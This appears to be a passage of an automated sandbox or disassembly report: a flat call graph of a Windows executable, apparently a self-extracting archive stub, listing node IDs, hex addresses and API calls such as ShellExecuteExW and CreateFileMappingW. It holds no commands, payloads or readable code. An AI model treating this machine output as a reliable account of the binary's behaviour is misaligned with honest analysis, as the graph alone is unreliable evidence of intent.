22936 29b188 22914->22936 22917 29b610 GetEnvironmentStringsW 22915->22917 22918 29b627 22917->22918 22928 29b67a 22917->22928 22921 29b62d WideCharToMultiByte 22918->22921 22919 2979ce 22919->22907 22929 297a0f 26 API calls 4 library calls 22919->22929 22920 29b683 FreeEnvironmentStringsW 22920->22919 22922 29b649 22921->22922 22921->22928 22923 298518 __vsnwprintf_l 21 API calls 22922->22923 22924 29b64f 22923->22924 22925 29b66c 22924->22925 22926 29b656 WideCharToMultiByte 22924->22926 22927 2984de _free 20 API calls 22925->22927 22926->22925 22927->22928 22928->22919 22928->22920 22929->22911 22931 2984e9 RtlFreeHeap 22930->22931 22932 298512 _free 22930->22932 22931->22932 22933 2984fe 22931->22933 22932->22907 23101 29895a 20 API calls _abort 22933->23101 22935 298504 GetLastError 22935->22932 22956 298fa5 GetLastError 22936->22956 22938 29b195 22977 29b2ae 22938->22977 22940 29b19d 22986 29af1b 22940->22986 22943 29b1b4 22943->22915 22946 29b1f7 22949 2984de _free 20 API calls 22946->22949 22949->22943 22950 29b1f2 23010 29895a 20 API calls _abort 22950->23010 22952 29b23b 22952->22946 23011 29adf1 26 API calls 22952->23011 22953 29b20f 22953->22952 22954 2984de _free 20 API calls 22953->22954 22954->22952 22957 298fbb 22956->22957 22958 298fc7 22956->22958 23012 29a61b 11 API calls 2 library calls 22957->23012 23013 2985a9 20 API calls 3 library calls 22958->23013 22961 298fd3 22963 298fdb 22961->22963 23014 29a671 11 API calls 2 library calls 22961->23014 22962 298fc1 22962->22958 22964 299010 SetLastError 22962->22964 22966 2984de _free 20 API calls 22963->22966 22964->22938 22968 298fe1 22966->22968 22967 298ff0 22967->22963 22969 298ff7 22967->22969 22970 29901c SetLastError 22968->22970 23015 298e16 20 API calls _abort 22969->23015 23016 298566 38 API calls _abort 22970->23016 22973 299002 22975 2984de _free 20 API calls 22973->22975 22976 299009 22975->22976 22976->22964 22976->22970 22978 29b2ba ___FrameUnwindToState 22977->22978 22979 298fa5 _abort 38 API calls 22978->22979 22981 29b2c4 22979->22981 22984 29b348 ___FrameUnwindToState 22981->22984 22985 2984de _free 20 API calls 22981->22985 23017 298566 38 API calls _abort 22981->23017 23018 29a3f1 EnterCriticalSection 22981->23018 23019 29b33f LeaveCriticalSection _abort 22981->23019 22984->22940 22985->22981 23020 293dd6 22986->23020 22989 29af3c GetOEMCP 22991 29af65 22989->22991 22990 29af4e 22990->22991 22992 29af53 GetACP 22990->22992 22991->22943 22993 298518 22991->22993 22992->22991 22994 298556 22993->22994 22998 298526 ___FrameUnwindToState 22993->22998 23031 29895a 20 API calls _abort 22994->23031 22995 298541 RtlAllocateHeap 22997 298554 22995->22997 22995->22998 22997->22946 23000 29b350 22997->23000 22998->22994 22998->22995 23030 2971ad 7 API calls 2 library calls 22998->23030 23001 29af1b 40 API calls 23000->23001 23002 29b36f 23001->23002 23005 29b3c0 IsValidCodePage 23002->23005 23007 29b376 23002->23007 23009 29b3e5 ___scrt_get_show_window_mode 23002->23009 23003 28ec4a _ValidateLocalCookies 5 API calls 23004 29b1ea 23003->23004 23004->22950 23004->22953 23006 29b3d2 GetCPInfo 23005->23006 23005->23007 23006->23007 23006->23009 23007->23003 23032 29aff4 GetCPInfo 23009->23032 23010->22946 23011->22946 23012->22962 23013->22961 23014->22967 23015->22973 23018->22981 23019->22981 23021 293de9 23020->23021 23022 293df3 23020->23022 23021->22989 23021->22990 23022->23021 23023 298fa5 _abort 38 API calls 23022->23023 23024 293e14 23023->23024 23028 2990fa 38 API calls __cftof 23024->23028 23026 293e2d 23029 299127 38 API calls __cftof 23026->23029 23028->23026 23029->23021 23030->22998 23031->22997 23037 29b02e 23032->23037 23041 29b0d8 23032->23041 23034 28ec4a _ValidateLocalCookies 5 API calls 23036 29b184 23034->23036 23036->23007 23042 29c099 23037->23042 23040 29a275 __vsnwprintf_l 43 API calls 23040->23041 23041->23034 23043 293dd6 __cftof 38 API calls 23042->23043 23044 29c0b9 MultiByteToWideChar 23043->23044 23046 29c0f7 23044->23046 23054 29c18f 23044->23054 23049 298518 __vsnwprintf_l 21 API calls 23046->23049 23051 29c118 __vsnwprintf_l ___scrt_get_show_window_mode 23046->23051 23047 28ec4a _ValidateLocalCookies 5 API calls 23050 29b08f 23047->23050 23048 29c189 23061 29a2c0 20 API calls _free 23048->23061 23049->23051 23056 29a275 23050->23056 23051->23048 23053 29c15d MultiByteToWideChar 23051->23053 23053->23048 23055 29c179 GetStringTypeW 23053->23055 23054->23047 23055->23048 23057 293dd6 __cftof 38 API calls 23056->23057 23058 29a288 23057->23058 23062 29a058 23058->23062 23061->23054 23064 29a073 __vsnwprintf_l 23062->23064 23063 29a099 MultiByteToWideChar 23065 29a24d 23063->23065 23066 29a0c3 23063->23066 23064->23063 23067 28ec4a _ValidateLocalCookies 5 API calls 23065->23067 23069 298518 __vsnwprintf_l 21 API calls 23066->23069 23071 29a0e4 __vsnwprintf_l 23066->23071 23068 29a260 23067->23068 23068->23040 23069->23071 23070 29a12d MultiByteToWideChar 23072 29a146 23070->23072 23084 29a199 23070->23084 23071->23070 23071->23084 23089 29a72c 23072->23089 23076 29a1a8 23080 298518 __vsnwprintf_l 21 API calls 23076->23080 23083 29a1c9 __vsnwprintf_l 23076->23083 23077 29a170 23078 29a72c __vsnwprintf_l 11 API calls 23077->23078 23077->23084 23078->23084 23079 29a23e 23097 29a2c0 20 API calls _free 23079->23097 23080->23083 23081 29a72c __vsnwprintf_l 11 API calls 23085 29a21d 23081->23085 23083->23079 23083->23081 23098 29a2c0 20 API calls _free 23084->23098 23085->23079 23086 29a22c WideCharToMultiByte 23085->23086 23086->23079 23087 29a26c 23086->23087 23099 29a2c0 20 API calls _free 23087->23099 23090 29a458 _abort 5 API calls 23089->23090 23091 29a753 23090->23091 23094 29a75c 23091->23094 23100 29a7b4 10 API calls 3 library calls 23091->23100 23093 29a79c LCMapStringW 23093->23094 23095 28ec4a _ValidateLocalCookies 5 API calls 23094->23095 23096 29a15d 23095->23096 23096->23076 23096->23077 23096->23084 23097->23084 23098->23065 23099->23084 23100->23093 23101->22935 24759 29ac0e 27 API calls _ValidateLocalCookies 23102 271385 82 API calls 3 library calls 24805 295780 QueryPerformanceFrequency QueryPerformanceCounter 24762 28a89d 78 API calls 24763 287090 109 API calls 24764 28cc90 70 API calls 24806 28a990 97 API calls 24807 289b90 GdipCloneImage GdipAlloc 23321 28d891 19 API calls ___delayLoadHelper2@8 24808 299b90 21 API calls 2 library calls 24809 292397 48 API calls 23323 28d997 23324 28d89b 23323->23324 23325 28df59 ___delayLoadHelper2@8 19 API calls 23324->23325 23325->23324 24766 27ea98 FreeLibrary 23330 28aee0 23331 28aeea __EH_prolog 23330->23331 23493 27130b 23331->23493 23334 28af18 23335 28b5cb 23568 28cd2e 23335->23568 23336 28af2c 23336->23334 23338 28af39 23336->23338 23339 28afa2 23336->23339 23342 28af3e 23338->23342 23343 28af75 23338->23343 23341 28b041 GetDlgItemTextW 23339->23341 23346 28afbc 23339->23346 23341->23343 23347 28b077 23341->23347 23342->23334 23351 27ddd1 53 API calls 23342->23351 23343->23334 23352 28af96 KiUserCallbackDispatcher 23343->23352 23344 28b5e9 SendMessageW 23345 28b5f7 23344->23345 23348 28b600 SendDlgItemMessageW 23345->23348 23349 28b611 GetDlgItem SendMessageW 23345->23349 23350 27ddd1 53 API calls 23346->23350 23353 28b08f GetDlgItem 23347->23353 23364 28b080 23347->23364 23348->23349 23586 289da4 GetCurrentDirectoryW 23349->23586 23358 28afde SetDlgItemTextW 23350->23358 23359 28af58 23351->23359 23352->23334 23356 28b0a4 SendMessageW SendMessageW 23353->23356 23357 28b0c5 SetFocus 23353->23357 23355 28b641 GetDlgItem 23360 28b65e 23355->23360 23361 28b664 SetWindowTextW 23355->23361 23356->23357 23362 28b0d5 23357->23362 23381 28b0ed 23357->23381 23367 28afec 23358->23367 23608 271241 SHGetMalloc 23359->23608 23360->23361 23587 28a2c7 GetClassNameW 23361->23587 23366 27ddd1 53 API calls 23362->23366 23364->23343 23369 28b56b 23364->23369 23371 28b0df 23366->23371 23367->23334 23372 28aff9 GetMessageW 23367->23372 23368 28af5f 23368->23334 23373 28af63 SetDlgItemTextW 23368->23373 23374 27ddd1 53 API calls 23369->23374 23609 28cb5a 23371->23609 23372->23334 23377 28b010 IsDialogMessageW 23372->23377 23373->23334 23378 28b57b SetDlgItemTextW 23374->23378 23377->23367 23380 28b01f TranslateMessage DispatchMessageW 23377->23380 23382 28b58f 23378->23382 23380->23367 23383 27ddd1 53 API calls 23381->23383 23384 27ddd1 53 API calls 23382->23384 23386 28b124 23383->23386 23387 28b5b8 23384->23387 23385 28b6af 23391 28b6df 23385->23391 23396 27ddd1 53 API calls 23385->23396 23392 27400a _swprintf 51 API calls 23386->23392 23394 27ddd1 53 API calls 23387->23394 23388 28b0e6 23503 27a04f 23388->23503 23390 28bdf5 98 API calls 23390->23385 23398 28bdf5 98 API calls 23391->23398 23442 28b797 23391->23442 23393 28b136 23392->23393 23397 28cb5a 16 API calls 23393->23397 23394->23334 23402 28b6c2 SetDlgItemTextW 23396->23402 23397->23388 23403 28b6fa 23398->23403 23399 28b847 23404 28b859 23399->23404 23405 28b850 EnableWindow 23399->23405 23400 28b17f 23509 28a322 SetCurrentDirectoryW 23400->23509 23401 28b174 GetLastError 23401->23400 23407 27ddd1 53 API calls 23402->23407 23412 28b70c 23403->23412 23430 28b731 23403->23430 23409 28b876 23404->23409 23627 2712c8 GetDlgItem EnableWindow 23404->23627 23405->23404 23408 28b6d6 SetDlgItemTextW 23407->23408 23408->23391 23411 28b89d 23409->23411 23420 28b895 SendMessageW 23409->23420 23410 28b195 23415 28b19e GetLastError 23410->23415 23416 28b1ac 23410->23416 23411->23334 23422 27ddd1 53 API calls 23411->23422 23625 289635 32 API calls 23412->23625 23413 28b78a 23417 28bdf5 98 API calls 23413->23417 23415->23416 23421 28b227 23416->23421 23426 28b237 23416->23426 23427 28b1c4 GetTickCount 23416->23427 23417->23442 23419 28b86c 23628 2712c8 GetDlgItem EnableWindow 23419->23628 23420->23411 23425 28b46c 23421->23425 23421->23426 23429 28b8b6 SetDlgItemTextW 23422->23429 23423 28b725 23423->23430 23525 2712e6 GetDlgItem ShowWindow 23425->23525 23432 28b24f GetModuleFileNameW 23426->23432 23433 28b407 23426->23433 23434 27400a _swprintf 51 API calls 23427->23434 23428 28b825 23626 289635 32 API calls 23428->23626 23429->23334 23430->23413 23437 28bdf5 98 API calls 23430->23437 23619 27eb3a 80 API calls 23432->23619 23433->23343 23446 27ddd1 53 API calls 23433->23446 23440 28b1dd 23434->23440 23436 27ddd1 53 API calls 23436->23442 23443 28b75f 23437->23443 23438 28b47c 23526 2712e6 GetDlgItem ShowWindow 23438->23526 23510 27971e 23440->23510 23441 28b844 23441->23399 23442->23399 23442->23428 23442->23436 23443->23413 23447 28b768 DialogBoxParamW 23443->23447 23445 28b275 23449 27400a _swprintf 51 API calls 23445->23449 23450 28b41b 23446->23450 23447->23343 23447->23413 23448 28b486 23527 27ddd1 23448->23527 23452 28b297 CreateFileMappingW 23449->23452 23453 27400a _swprintf 51 API calls 23450->23453 23456 28b2f9 GetCommandLineW 23452->23456 23487 28b376 __vsnwprintf_l 23452->23487 23457 28b439 23453->23457 23461 28b30a 23456->23461 23470 27ddd1 53 API calls 23457->23470 23458 28b203 23462 28b215 23458->23462 23463 28b20a GetLastError 23458->23463 23459 28b381 ShellExecuteExW 23485 28b39e 23459->23485 23620 28ab2e SHGetMalloc 23461->23620 23518 279653 23462->23518 23463->23462 23464 28b4a2 SetDlgItemTextW GetDlgItem 23467 28b4bf GetWindowLongW SetWindowLongW 23464->23467 23468 28b4d7 23464->23468 23467->23468 23531 28bdf5 23468->23531 23469 28b326 23621 28ab2e SHGetMalloc 23469->23621 23470->23343 23474 28b332 23622 28ab2e SHGetMalloc 23474->23622 23475 28b3e1 23475->23433 23481 28b3f7 UnmapViewOfFile CloseHandle 23475->23481 23476 28bdf5 98 API calls 23479 28b4f3 23476->23479 23478 28b33e 23623 27ecad 80 API calls ___scrt_get_show_window_mode 23478->23623 23556 28d0f5 23479->23556 23481->23433 23484 28b355 MapViewOfFile 23484->23487 23485->23475 23488 28b3cd Sleep 23485->23488 23486 28bdf5 98 API calls 23491 28b519 23486->23491 23487->23459 23488->23475 23488->23485 23489 28b542 23624 2712c8 GetDlgItem EnableWindow 23489->23624 23491->23489 23492 28bdf5 98 API calls 23491->23492 23492->23489 23494 271314 23493->23494 23495 27136d 23493->23495 23497 27137a 23494->23497 23629 27da98 62 API calls 2 library calls 23494->23629 23630 27da71 GetWindowLongW SetWindowLongW 23495->23630 23497->23334 23497->23335 23497->23336 23499 271336 23499->23497 23500 271349 GetDlgItem 23499->23500 23500->23497 23501 271359 23500->23501 23501->23497 23502 27135f SetWindowTextW 23501->23502 23502->23497 23505 27a059 23503->23505 23504 27a0ea 23506 27a207 9 API calls 23504->23506 23508 27a113 23504->23508 23505->23504 23505->23508 23631 27a207 23505->23631 23506->23508 23508->23400 23508->23401 23509->23410 23511 279728 23510->23511 23512 279792 CreateFileW 23511->23512 23513 279786 23511->23513 23512->23513 23514 2797e4 23513->23514 23515 27b66c 2 API calls 23513->23515 23514->23458 23516 2797cb 23515->23516 23516->23514 23517 2797cf CreateFileW 23516->23517 23517->23514 23519 279688 23518->23519 23520 279677 23518->23520 23519->23421 23520->23519 23521 279683 23520->23521 23522 27968a 23520->23522 23652 279817 23521->23652 23657 2796d0 23522->23657 23525->23438 23526->23448 23672 27ddff 23527->23672 23530 2712e6 GetDlgItem ShowWindow 23530->23464 23532 28bdff __EH_prolog 23531->23532 23533 28b4e5 23532->23533 23534 28aa36 ExpandEnvironmentStringsW 23532->23534 23533->23476 23542 28be36 _wcsrchr 23534->23542 23536 28aa36 ExpandEnvironmentStringsW 23536->23542 23537 28c11d SetWindowTextW 23537->23542 23540 2935de 22 API calls 23540->23542 23542->23533 23542->23536 23542->23537 23542->23540 23543 28bf0b SetFileAttributesW 23542->23543 23548 28c2e7 GetDlgItem SetWindowTextW SendMessageW 23542->23548 23551 28c327 SendMessageW 23542->23551 23695 2817ac CompareStringW 23542->23695 23696 289da4 GetCurrentDirectoryW 23542->23696 23698 27a52a 7 API calls 23542->23698 23699 27a4b3 FindClose 23542->23699 23700 28ab9a 76 API calls new 23542->23700 23544 28bfc5 GetFileAttributesW 23543->23544 23555 28bf25 ___scrt_get_show_window_mode 23543->23555 23544->23542 23547 28bfd7 DeleteFileW 23544->23547 23547->23542 23549 28bfe8 23547->23549 23548->23542 23550 27400a _swprintf 51 API calls 23549->23550 23552 28c008 GetFileAttributesW 23550->23552 23551->23542 23552->23549 23553 28c01d MoveFileW 23552->23553 23553->23542 23554 28c035 MoveFileExW 23553->23554 23554->23542 23555->23542 23555->23544 23697 27b4f7 52 API calls 2 library calls 23555->23697 23557 28d0ff __EH_prolog 23556->23557 23701 27fead 23557->23701 23559 28d130 23705 275c59 23559->23705 23561 28d14e 23709 277c68 23561->23709 23565 28d1a1 23726 277cfb 23565->23726 23567 28b504 23567->23486 23569 28cd38 23568->23569 24189 289d1a 23569->24189 23572 28cd45 GetWindow 23573 28cd65 23572->23573 23574 28b5d1 23572->23574 23573->23574 23575 28cd72 GetClassNameW 23573->23575 23577 28cdfa GetWindow 23573->23577 23578 28cd96 GetWindowLongW 23573->23578 23574->23344 23574->23345 24194 2817ac CompareStringW 23575->24194 23577->23573 23577->23574 23578->23577 23579 28cda6 SendMessageW 23578->23579 23579->23577 23580 28cdbc GetObjectW 23579->23580 24195 289d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23580->24195 23582 28cdd3 24196 289d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23582->24196 24197 289f5d 8 API calls ___scrt_get_show_window_mode 23582->24197 23585 28cde4 SendMessageW DeleteObject 23585->23577 23586->23355 23588 28a2e8 23587->23588 23593 28a30d 23587->23593 24200 2817ac CompareStringW 23588->24200 23590 28a31b 23595 28a7c3 23590->23595 23591 28a312 SHAutoComplete 23591->23590 23592 28a2fb 23592->23593 23594 28a2ff FindWindowExW 23592->23594 23593->23590 23593->23591 23594->23593 23596 28a7cd __EH_prolog 23595->23596 23597 271380 82 API calls 23596->23597 23598 28a7ef 23597->23598 24201 271f4f 23598->24201 23601 28a818 23604 271951 121 API calls 23601->23604 23602 28a809 23603 271631 84 API calls 23602->23603 23605 28a814 23603->23605 23606 28a83a __vsnwprintf_l new 23604->23606 23605->23385 23605->23390 23606->23605 23607 271631 84 API calls 23606->23607 23607->23605 23608->23368 24209 28ac74 PeekMessageW 23609->24209 23612 28cb88 23616 28cb93 ShowWindow SendMessageW SendMessageW 23612->23616 23613 28cbbc SendMessageW SendMessageW 23614 28cbf8 23613->23614 23615 28cc17 SendMessageW SendMessageW SendMessageW 23613->23615 23614->23615 23617 28cc4a SendMessageW 23615->23617 23618 28cc6d SendMessageW 23615->23618 23616->23613 23617->23618 23618->23388 23619->23445 23620->23469 23621->23474 23622->23478 23623->23484 23624->23364 23625->23423 23626->23441 23627->23419 23628->23409 23629->23499 23630->23497 23632 27a214 23631->23632 23633 27a238 23632->23633 23634 27a22b CreateDirectoryW 23632->23634 23635 27a180 4 API calls 23633->23635 23634->23633 23636 27a26b 23634->23636 23637 27a23e 23635->23637 23639 27a27a 23636->23639 23644 27a444 23636->23644 23638 27a27e GetLastError 23637->23638 23640 27b66c 2 API calls 23637->23640 23638->23639 23639->23505 23642 27a254 23640->23642 23642->23638 23643 27a258 CreateDirectoryW 23642->23643 23643->23636 23643->23638 23645 28e360 23644->23645 23646 27a451 SetFileAttributesW 23645->23646 23647 27a467 23646->23647 23648 27a494 23646->23648 23649 27b66c 2 API calls 23647->23649 23648->23639 23650 27a47b 23649->23650 23650->23648 23651 27a47f SetFileAttributesW 23650->23651 23651->23648 23653 279820 23652->23653 23656 279824 23652->23656 23653->23519 23656->23653 23663 27a12d 23656->23663 23658 2796dc 23657->23658 23661 2796fa 23657->23661 23660 2796e8 FindCloseChangeNotification 23658->23660 23658->23661 23659 279719 23659->23519 23660->23661 23661->23659 23671 276e3e 74 API calls 23661->23671 23664 28e360 23663->23664 23665 27a13a DeleteFileW 23664->23665 23666 27984c 23665->23666 23667 27a14d 23665->23667 23666->23519 23668 27b66c 2 API calls 23667->23668 23669 27a161 23668->23669 23669->23666 23670 27a165 DeleteFileW 23669->23670 23670->23666 23671->23659 23678 27d28a 23672->23678 23675 27de22 LoadStringW 23676 27ddfc SetDlgItemTextW 23675->23676 23677 27de39 LoadStringW 23675->23677 23676->23530 23677->23676 23683 27d1c3 23678->23683 23680 27d2a7 23681 27d2bc 23680->23681 23691 27d2c8 26 API calls 23680->23691 23681->23675 23681->23676 23684 27d1d7 _strncpy 23683->23684 23685 27d1de 23683->23685 23684->23680 23687 27d202 23685->23687 23692 281596 WideCharToMultiByte 23685->23692 23690 27d233 23687->23690 23693 27dd6b 50 API calls __vsnprintf 23687->23693 23694 2958d9 26 API calls 3 library calls 23690->23694 23691->23681 23692->23687 23693->23690 23694->23684 23695->23542 23696->23542 23697->23555 23698->23542 23699->23542 23700->23542 23702 27feba 23701->23702 23730 271789 23702->23730 23704 27fed2 23704->23559 23706 27fead 23705->23706 23707 271789 76 API calls 23706->23707 23708 27fed2 23707->23708 23708->23561 23710 277c72 __EH_prolog 23709->23710 23747 27c827 23710->23747 23712 277c8d 23753 28e24a 23712->23753 23714 277cb7 23759 28440b 23714->23759 23717 277ddf 23718 277de9 23717->23718 23723 277e53 23718->23723 23791 27a4c6 23718->23791 23720 277f06 23720->23565 23721 277ec4 23721->23720 23797 276dc1 74 API calls 23721->23797 23723->23721 23725 27a4c6 8 API calls 23723->23725 23769 27837f 23723->23769 23725->23723 23727 277d09 23726->23727 23729 277d10 23726->23729 23728 281acf 84 API calls 23727->23728 23728->23729 23731 27179f 23730->23731 23742 2717fa __vsnwprintf_l 23730->23742 23732 2717c8 23731->23732 23743 276e91 74 API calls __vswprintf_c_l 23731->23743 23733 271827 23732->23733 23739 2717e7 new 23732->23739 23736 2935de 22 API calls 23733->23736 23735 2717be 23744 276efd 75 API calls 23735->23744 23737 27182e 23736->23737 23737->23742 23746 276efd 75 API calls 23737->23746 23739->23742 23745 276efd 75 API calls 23739->23745 23742->23704 23743->23735 23744->23732 23745->23742 23746->23742 23748 27c831 __EH_prolog 23747->23748 23749 28e24a new 8 API calls 23748->23749 23750 27c874 23749->23750 23751 28e24a new 8 API calls 23750->23751 23752 27c898 23751->23752 23752->23712 23756 28e24f new 23753->23756 23754 28e27b 23754->23714 23756->23754 23765 2971ad 7 API calls 2 library calls 23756->23765 23766 28ecce RaiseException FindHandler new 23756->23766 23767 28ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23756->23767 23760 284415 __EH_prolog 23759->23760 23761 28e24a new 8 API calls 23760->23761 23763 284431 23761->23763 23762 277ce6 23762->23717 23763->23762 23768 2806ba 78 API calls 23763->23768 23765->23756 23768->23762 23770 278389 __EH_prolog 23769->23770 23798 271380 23770->23798 23772 2783a4 23806 279ef7 23772->23806 23778 2783d3 23926 271631 23778->23926 23779 27846e 23825 278517 23779->23825 23783 2784ce 23829 271f00 23783->23829 23786 2783cf 23786->23778 23786->23779 23789 27a4c6 8 API calls 23786->23789 23930 27bac4 CompareStringW 23786->23930 23787 2784d9 23787->23778 23833 273aac 23787->23833 23843 27857b 23787->23843 23789->23786 23792 27a4db 23791->23792 23793 27a4df 23792->23793 24177 27a5f4 23792->24177 23793->23718 23795 27a4ef 23795->23793 23796 27a4f4 FindClose 23795->23796 23796->23793 23797->23720 23799 271385 __EH_prolog 23798->23799 23800 27c827 8 API calls 23799->23800 23801 2713bd 23800->23801 23802 28e24a new 8 API calls 23801->23802 23805 271416 ___scrt_get_show_window_mode 23801->23805 23803 271403 23802->23803 23803->23805 23932 27b07d 23803->23932 23805->23772 23807 279f0e 23806->23807 23808 2783ba 23807->23808 23948 276f5d 76 API calls 23807->23948 23808->23778 23810 2719a6 23808->23810 23811 2719b0 __EH_prolog 23810->23811 23822 271a00 23811->23822 23823 2719e5 23811->23823 23949 27709d 23811->23949 23813 271b50 23952 276dc1 74 API calls 23813->23952 23815 273aac 97 API calls 23819 271bb3 23815->23819 23816 271b60 23816->23815 23816->23823 23817 271bff 23817->23823 23824 271c32 23817->23824 23953 276dc1 74 API calls 23817->23953 23819->23817 23820 273aac 97 API calls 23819->23820 23820->23819 23821 273aac 97 API calls 23821->23824 23822->23813 23822->23816 23822->23823 23823->23786 23824->23821 23824->23823 23826 278524 23825->23826 23971 280c26 GetSystemTime SystemTimeToFileTime 23826->23971 23828 278488 23828->23783 23931 281359 72 API calls 23828->23931 23831 271f05 __EH_prolog 23829->23831 23830 271f39 23830->23787 23831->23830 23973 271951 23831->23973 23834 273abc 23833->23834 23835 273ab8 23833->23835 23836 273af7 23834->23836 23837 273ae9 23834->23837 23835->23787 24108 2727e8 97 API calls 3 library calls 23836->24108 23839 273b29 23837->23839 24107 273281 85 API calls 3 library calls 23837->24107 23839->23787 23841 273af5 23841->23839 24109 27204e 74 API calls 23841->24109 23844 278585 __EH_prolog 23843->23844 23845 2785be 23844->23845 23858 2785c2 23844->23858 24132 2884bd 99 API calls 23844->24132 23846 2785e7 23845->23846 23852 27867a 23845->23852 23845->23858 23847 278609 23846->23847 23846->23858 24133 277b66 146 API calls 23846->24133 23847->23858 24134 2884bd 99 API calls 23847->24134 23852->23858 24110 275e3a 23852->24110 23853 278705 23853->23858 24116 27826a 23853->24116 23856 278875 23857 27a4c6 8 API calls 23856->23857 23859 2788e0 23856->23859 23857->23859 23858->23787 24120 277d6c 23859->24120 23861 27c991 80 API calls 23864 27893b _memcmp 23861->23864 23862 278a70 23863 278b43 23862->23863 23870 278abf 23862->23870 23868 278b9e 23863->23868 23879 278b4e 23863->23879 23864->23858 23864->23861 23864->23862 23865 278a69 23864->23865 24135 278236 82 API calls 23864->24135 24136 271f94 74 API calls 23864->24136 24137 271f94 74 API calls 23865->24137 23877 278b30 23868->23877 24140 2780ea 96 API calls 23868->24140 23869 278b9c 23871 279653 79 API calls 23869->23871 23872 27a180 4 API calls 23870->23872 23870->23877 23871->23858 23875 278af7 23872->23875 23874 279653 79 API calls 23874->23858 23875->23877 24138 279377 96 API calls 23875->24138 23876 278c09 23889 278c74 23876->23889 23925 2791c1 __except_handler4 23876->23925 24141 279989 23876->24141 23877->23869 23877->23876 23879->23869 24139 277f26 100 API calls __except_handler4 23879->24139 23880 27aa88 8 API calls 23883 278cc3 23880->23883 23881 278c4c 23881->23889 24145 271f94 74 API calls 23881->24145 23885 27aa88 8 API calls 23883->23885 23904 278cd9 23885->23904 23887 278c62 24146 277061 75 API calls 23887->24146 23889->23880 23890 278d9c 23891 278df7 23890->23891 23892 278efd 23890->23892 23893 278e69 23891->23893 23896 278e07 23891->23896 23894 278f23 23892->23894 23895 278f0f 23892->23895 23914 278e27 23892->23914 23897 27826a CharUpperW 23893->23897 23899 282c42 75 API calls 23894->23899 23898 2792e6 116 API calls 23895->23898 23900 278e4d 23896->23900 23905 278e15 23896->23905 23901 278e84 23897->23901 23898->23914 23903 278f3c 23899->23903 23900->23914 24149 277907 108 API calls 23900->24149 23909 278eb4 23901->23909 23910 278ead 23901->23910 23901->23914 24152 2828f1 116 API calls 23903->24152 23904->23890 24147 279b21 SetFilePointer GetLastError SetEndOfFile 23904->24147 24148 271f94 74 API calls 23905->24148 24151 279224 94 API calls __EH_prolog 23909->24151 24150 277698 84 API calls __except_handler4 23910->24150 23916 27904b 23914->23916 24153 271f94 74 API calls 23914->24153 23915 279156 23918 27a444 4 API calls 23915->23918 23915->23925 23916->23915 23917 279104 23916->23917 23916->23925 24126 279ebf SetEndOfFile 23916->24126 24127 279d62 23917->24127 23919 2791b1 23918->23919 23919->23925 24154 271f94 74 API calls 23919->24154 23922 27914b 23924 2796d0 75 API calls 23922->23924 23924->23915 23925->23874 23927 271643 23926->23927 24169 27c8ca 23927->24169 23930->23786 23931->23783 23933 27b087 __EH_prolog 23932->23933 23938 27ea80 80 API calls 23933->23938 23935 27b099 23939 27b195 23935->23939 23938->23935 23940 27b1a7 ___scrt_get_show_window_mode 23939->23940 23943 280948 23940->23943 23946 280908 GetCurrentProcess GetProcessAffinityMask 23943->23946 23947 27b10f 23946->23947 23947->23805 23948->23808 23954 2716d2 23949->23954 23951 2770b9 23951->23822 23952->23823 23953->23824 23956 2716e8 23954->23956 23966 271740 __vsnwprintf_l 23954->23966 23955 271711 23958 271767 23955->23958 23963 27172d new 23955->23963 23956->23955 23967 276e91 74 API calls __vswprintf_c_l 23956->23967 23960 2935de 22 API calls 23958->23960 23959 271707 23968 276efd 75 API calls 23959->23968 23962 27176e 23960->23962 23962->23966 23970 276efd 75 API calls 23962->23970 23963->23966 23969 276efd 75 API calls 23963->23969 23966->23951 23967->23959 23968->23955 23969->23966 23970->23966 23972 280c56 __vsnwprintf_l 23971->23972 23972->23828 23974 271961 23973->23974 23975 27195d 23973->23975 23977 271896 23974->23977 23975->23830 23978 2718a8 23977->23978 23979 2718e5 23977->23979 23980 273aac 97 API calls 23978->23980 23985 273f18 23979->23985 23983 2718c8 23980->23983 23983->23975 23988 273f21 23985->23988 23986 273aac 97 API calls 23986->23988 23987 271906 23987->23983 23990 271e00 23987->23990 23988->23986 23988->23987 24002 28067c 23988->24002 23991 271e0a __EH_prolog 23990->23991 24010 273b3d 23991->24010 23993 271e34 23994 2716d2 76 API calls 23993->23994 23995 271ebb 23993->23995 23996 271e4b 23994->23996 23995->23983 24038 271849 76 API calls 23996->24038 23998 271e63 24000 271e6f 23998->24000 24039 28137a MultiByteToWideChar 23998->24039 24040 271849 76 API calls 24000->24040 24003 280683 24002->24003 24006 28069e 24003->24006 24008 276e8c RaiseException FindHandler 24003->24008 24005 2806af SetThreadExecutionState 24005->23988 24006->24005 24009 276e8c RaiseException FindHandler 24006->24009 24008->24006 24009->24005 24011 273b47 __EH_prolog 24010->24011 24012 273b5d 24011->24012 24013 273b79 24011->24013 24069 276dc1 74 API calls 24012->24069 24015 273dc2 24013->24015 24018 273ba5 24013->24018 24086 276dc1 74 API calls 24015->24086 24017 273b68 24017->23993 24018->24017 24041 282c42 24018->24041 24020 273cb1 24054 27aa88 24020->24054 24022 273bf4 24023 273c12 24022->24023 24024 273c22 24022->24024 24030 273c26 24022->24030 24070 276dc1 74 API calls 24023->24070 24024->24030 24071 272034 76 API calls 24024->24071 24027 273cc4 24031 273d3e 24027->24031 24032 273d48 24027->24032 24030->24020 24037 273c1d 24030->24037 24072 27c991 24030->24072 24058 2792e6 24031->24058 24078 2828f1 116 API calls 24032->24078 24035 273d46 24035->24037 24079 271f94 74 API calls 24035->24079 24080 281acf 24037->24080 24038->23998 24039->24000 24040->23995 24042 282c51 24041->24042 24044 282c5b 24041->24044 24087 276efd 75 API calls 24042->24087 24045 282ca2 new 24044->24045 24048 282c9d Concurrency::cancel_current_task 24044->24048 24053 282cfd ___scrt_get_show_window_mode 24044->24053 24046 282da9 Concurrency::cancel_current_task 24045->24046 24047 282cd9 24045->24047 24045->24053 24090 29157a RaiseException 24046->24090 24088 282b7b 75 API calls 4 library calls 24047->24088 24089 29157a RaiseException 24048->24089 24052 282dc1 24053->24022 24055 27aa95 24054->24055 24057 27aa9f 24054->24057 24056 28e24a new 8 API calls 24055->24056 24056->24057 24057->24027 24059 2792f0 __EH_prolog 24058->24059 24091 277dc6 24059->24091 24062 27709d 76 API calls 24063 279302 24062->24063 24094 27ca6c 24063->24094 24065 27935c 24065->24035 24066 279314 24066->24065 24067 27ca6c 109 API calls 24066->24067 24103 27cc51 92 API calls __vsnwprintf_l 